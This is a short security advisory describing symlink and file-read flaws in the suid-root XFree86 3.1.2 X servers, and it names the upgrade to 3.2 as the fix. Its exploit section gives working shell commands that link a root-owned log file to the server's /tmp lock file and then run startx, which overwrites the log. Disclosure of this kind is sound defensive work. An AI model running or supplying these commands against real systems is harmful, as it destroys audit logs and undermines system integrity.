COMMAND

    XFree86 3.1.2 servers (/usr/X11R6/bin/XF86_*)

SYSTEMS AFFECTED

    All systems with XFree86 3.1.2 installed

PROBLEM

    There  are  security  holes  in  XFree86 3.1.2, which installs its
    servers as  suid root  (/usr/X11R6/bin/XF86_*).   When reading and
    writing files, it does not take proper precautions to ensure  that
    file  permissions  are  maintained,  resulting  in  the ability to
    overwrite files, and to read limited portions of other files.

    The first problem stems from the server opening a temporary  file,
    /tmp/.tX0-lock with  mode (O_WRONLY|O_CREAT|O_TRUNC).   By  making
    this file a symlink, the server will overwrite the original  file,
    and then write to it its current pid.

    Other problems exist in  the server relating to  similar problems,
    one such example is the  ability to specify an arbitrary  file for
    the XF86config file which will then be opened, and the first  line
    that fails  to match  the expected  format will  be output with an
    error, allowing a line to be read from an arbitrary file.

    Exploit:

    $ ls -l /var/adm/wtmp
    -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
    $ ln -s /var/adm/wtmp /tmp/.tX0-lock
    $ startx
    (At this point exit X if it started, or else ignore any error messages)
    $ ls -l /var/adm/wtmp
    -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

SOLUTION

    XFree 3.2 is out with fixed bug.